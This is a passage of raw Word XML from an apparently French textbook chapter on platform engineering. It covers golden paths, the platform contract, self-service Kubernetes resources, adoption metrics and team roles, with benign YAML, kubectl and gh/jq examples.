      </w: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LE CHEMIN D'OR DOIT ÊTRE PLUS RAPIDE QUE LE CONTOURNEMENT</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Si monter son propre pipeline prend une heure et que le modèle en demande trois, personne ne l'utilisera. La plateforme gagne par la commodité, jamais par l'obligation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>89.2 Le contrat</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un chemin d'or s'accompagne d'un contrat : ce que la plateforme garantit, ce qu'elle attend en retour, et comment sortir du chemin si le besoin l'exige.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.350 — Quatre clauses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44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Élément</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="309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Contenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Exemple</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Garanties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ce qui est maintenu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Pipeline, TLS, journaux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>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Niveaux de service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Disponibilité, délais</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Réponse sous 2 jours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Responsabilités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3091"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Qui fait quoi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3477"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Équipe : code, plateforme : socle</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2447"/>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Échappatoire</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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Sortie documentée</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="347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Pipeline personnalisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un contrat lisible · markdown</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Contrat de plateforme (extrait)</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Ce que la plateforme fournit</w:t>
        <w:br/>
        <w:t>- Un pipeline de référence maintenu, mis à jour automatiquement</w:t>
        <w:br/>
        <w:t>- TLS et nom de domaine</w:t>
        <w:br/>
        <w:t>- Journaux, métriques et traces collectés</w:t>
        <w:br/>
        <w:t>- Sauvegarde quotidienne des bases fournies</w:t>
        <w:br/>
        <w:t>- Astreinte sur le socle, du lundi au vendredi 8h-20h</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Ce que l'équipe fournit</w:t>
        <w:br/>
        <w:t>- Un propriétaire nommé dans le dépôt</w:t>
        <w:br/>
        <w:t>- Des tests qui échouent quand le service est cassé</w:t>
        <w:br/>
        <w:t>- Un runbook à jour</w:t>
        <w:br/>
        <w:t>- Un budget de performance respecté</w:t>
        <w:br/>
        <w:br/>
        <w:t>## Hors périmètre</w:t>
        <w:br/>
        <w:t>- Le code applicatif</w:t>
        <w:br/>
        <w:t>- Les choix de modèle de données</w:t>
        <w:br/>
        <w:t>- Les incidents liés à une dépendance non fournie</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>89.3 Modèle et auto-service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le modèle crée un service conforme en quelques minutes. L'auto-service évite la file d'attente : l'équipe obtient une base, un espace de noms ou un certificat sans ouvrir de ticket.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une demande déclarative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Ressource personnalisée : une base fournie en libre-service</w:t>
        <w:br/>
        <w:t>apiVersion: platform.exemple.fr/v1</w:t>
        <w:br/>
        <w:t>kind: BaseDeDonnees</w:t>
        <w:br/>
        <w:t>metadata:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  name: catalogue</w:t>
        <w:br/>
        <w:t xml:space="preserve">  namespace: boutique</w:t>
        <w:br/>
        <w:t>spec:</w:t>
        <w:br/>
        <w:t xml:space="preserve">  moteur: postgresql</w:t>
        <w:br/>
        <w:t xml:space="preserve">  version: "16"</w:t>
        <w:br/>
        <w:t xml:space="preserve">  taille: petite          # petite | moyenne | grande</w:t>
        <w:br/>
        <w:t xml:space="preserve">  sauvegarde: quotidienne</w:t>
        <w:br/>
        <w:t xml:space="preserve">  retentionJours: 14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Ce qui est produit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Ce que l'opérateur crée derrière la demande</w:t>
        <w:br/>
        <w:t># - une instance managée (ou un opérateur CloudNativePG)</w:t>
        <w:br/>
        <w:t># - un secret de connexion dans l'espace de noms</w:t>
        <w:br/>
        <w:t># - une politique de sauvegarde</w:t>
        <w:br/>
        <w:t># - des alertes de saturation</w:t>
        <w:br/>
        <w:t>kubectl get basededonnees -n boutique</w:t>
        <w:br/>
        <w:t># NAME        MOTEUR      TAILLE   PRET   AGE</w:t>
        <w:br/>
        <w:t># catalogue   postgresql  petite   True   3m</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.351 — Quatre capacités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9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Capacité</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Avant</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Après</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Base de données</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Ticket, 3 jours</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Déclaratif, 5 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Certificat TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>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Ticket, 1 jour</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Automatique</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2962"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Espace de noms</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Ticket, 1 jour</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Modèle, immédiat</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Tableau de bord</w:t>
            </w:r>
          </w:p>
        </w:tc>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À construire</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Fourni</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L'AUTO-SERVICE SANS GARDE-FOUS PRODUIT DU DÉSORDRE</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Une capacité libre-service doit imposer des limites : quotas par espace de noms, tailles autorisées, versions supportées, étiquettes obligatoires. La liberté porte sur le choix, pas sur les règles.</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OPÉRATEUR KUBERNETES</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Contrôleur qui étend l'API avec des ressources personnalisées et réconcilie leur état, comme le ferait un opérateur humain.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>89.4 Mesurer</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une plateforme se juge sur le délai de mise en production d'un nouveau service et sur le temps que les équipes passent hors de leur métier. Ces deux mesures suffisent à décider des investissements.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.352 — Cinq indicateurs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34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Indicateur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Définition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="283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Cible</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Délai du premier déploiement</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Création → production</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&lt; 1 jour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="334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Part des services sur le chemin d'or</w:t>
            </w:r>
          </w:p>
        </w:tc>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Adoption</w:t>
            </w:r>
          </w:p>
        </w:tc>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&gt; 80 %</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Temps de restauration d'une capacité</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Demande → disponible</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&lt; 10 min</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>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Tickets d'infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>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Volume par mois</w:t>
            </w:r>
          </w:p>
        </w:tc>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En baisse</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3348"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Satisfaction</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Enquête trimestrielle</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&gt; 4/5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Une mesure d'adoption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Mesure de l'adoption : dépôts utilisant le pipeline fourni</w:t>
        <w:br/>
        <w:t>gh api orgs/mon-org/repos --paginate \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | jq -r '.[].name' \</w:t>
        <w:br/>
        <w:t xml:space="preserve">  | while read r; do</w:t>
        <w:br/>
        <w:t>gh api "repos/mon-org/$r/contents/.github/workflows/ci.yml" &gt;/dev/null 2&gt;&amp;1 \</w:t>
        <w:br/>
        <w:t xml:space="preserve">        &amp;&amp; echo "$r utilise le pipeline fourni"</w:t>
        <w:br/>
        <w:t xml:space="preserve">    done</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="120" w:after="0" w:line="20" w:lineRule="exact"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5580000" cy="2667000"/>
            <wp:docPr id="106" name="Picture 106"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="c00_f104.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId146"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580000" cy="2667000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Figure 0.104 — Deux pièges opposés</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>89.5 Organiser l'équipe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Une plateforme demande une équipe restreinte, stable et proche des utilisateurs. Le piège classique est de la transformer en centre de services, qui répond aux demandes au lieu de construire des capacités.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.353 — Quatre rôles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Responsabilité</w:t>
            </w:r>
          </w:p>
        </w:tc>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Piège</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Responsable produit</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Prioriser les capacités</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Arbitrage absent</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Ingénieur plateforme</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Construire et maintenir</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Surcharge d'exploitation</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Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Ingénieur fiabilité</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SLO du socle</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Confondu avec l'astreinte applicative</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>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Référent par équipe</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Remonter les besoins</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Canal informel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="80" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Un rituel court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Rituel mensuel de plateforme</w:t>
        <w:br/>
        <w:t>1. Revue des indicateurs d'adoption</w:t>
        <w:br/>
        <w:t>2. Trois irritants utilisateurs les plus fréquents</w:t>
        <w:br/>
        <w:t>3. Une capacité à retirer (dette)</w:t>
        <w:br/>
        <w:t>4. Une capacité à ajouter</w:t>
        <w:br/>
        <w:t>5. Mise à jour du contrat</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CONSTRUIRE UNE PLATEFORME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Partir des parcours réels, pas des outils disponibles.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Livrer un chemin d'or complet avant d'en ajouter un second.</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Rendre le contournement possible et visible.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Mesurer le délai de mise en production.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Retirer régulièrement des capacités devenues inutiles.</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plateforme est un produit avec des utilisateurs et un contrat.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chemin d'or couvre le cas majoritaire, sans être obligatoire.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chemin d'or gagne par la commodité, pas par l'obligation.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contrat précise garanties, responsabilités et échappatoire.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L'auto-service exige des quotas et des règles.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L'opérateur transforme une demande déclarative en ressources réelles.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L'adoption et le délai de mise en production sont les bons indicateurs.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équipe plateforme construit des capacités, elle ne répond pas aux tickets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Les équipes livrent vite sur un socle commun. Reste à sécuriser ce qui entre dans ce socle : la chaîne logicielle.</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89.1 — Définir un chemin d'or</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Une équipe doit livrer un service en moins d'une journée.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Listez les étapes.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Précisez ce qui est fourni.</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Fixez le contrat.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 89.2 — Créer une capacité en libre-service</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   ARCHITECTURE</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
